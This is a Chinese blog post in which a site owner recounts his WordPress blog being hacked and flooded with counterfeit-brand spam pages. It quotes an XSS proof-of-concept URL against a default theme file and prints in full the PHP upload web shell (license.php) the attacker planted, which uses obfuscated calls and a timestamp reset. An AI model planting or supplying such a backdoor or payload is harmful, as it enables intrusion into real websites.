博客被入侵实录

电商经验 Alan 10年前 (2015-05-09) 8523次浏览 0个评论 扫描二维码

网络上现在黑客行为无处不在,大公司也鲜有幸免者,频频被脱裤。前段时间Magento曝出高危漏洞,还有Wordpress的插件WordPress SEO by Yoast曝出存在SQL注入漏洞,今天看到Wordpress的默认主题竟然也存在着跨站脚本漏洞:
http:// site.com/wp-content/themes/twentyfifteen/genericons/example.html#1<img/ src=1 onerror= alert(1)>

于是前几天Alan的一个英文Wordpress站点也被攻击了,这个博客将近半年多没有打理,想必是未及时升级被人利用了之前的漏洞进行攻击。其实人在江湖谁能不挨刀呢,最让我无语的是这个黑客竟然上传了近两万个文件(html+js),差不多有两个G,这个站点布置在一个低配置的GoDaddy主机上,于是删文件花了我两个多小时。看来现在黑客也不好混呀,抓住一个就疯狂的掠夺。

文件都是一些Nike之类的仿牌,本人也不屑于去投诉什么的,做仿牌的也是苦海无涯啊,做大了就更麻烦了。

话说这个攻击就是利用漏洞在根目录添加了一个license.php文件,其实也就是用于处理上传文件的一个php脚本,代码如下文。

另外Google的灵敏度还是挺赞的,今天就收到了一封标题为[Webmaster Tools] Hacking suspected:http://www.domain.com的邮件,估计这种黑帽SEO手段在国外早就没什么效果了吧。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<html>
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=windows-utf-8">
        <title>utf</title>
    </head>
    <body>
        <?php
        print "<h1>#p@$c@#</h1>\n";
        echo "Your IP: ";
        echo $_SERVER['REMOTE_ADDR'];
        echo "<form method=\"post\" enctype=\"multipart/form-data\">\n";
        echo "<input type=\"file\" name=\"filename\"><br> \n";
        echo "<input type=\"submit\" value=\"LOAD\"><br>\n";
        echo "</form>\n";
        if(is_uploaded_file/*;*/($_FILES["filename"]["tmp_name"]))
            {
            move_uploaded_file/*;*/($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]);
            $file = $_FILES/*;*/["filename"]["name"];
            echo "<a href=\"$file\">$file</a>";
            } else {
            echo("empty");
            }
        $filename = $_SERVER[SCRIPT_FILENAME];
        touch/*;*/($filename, $time);
        ?>
    </body>
</html>
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论

表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址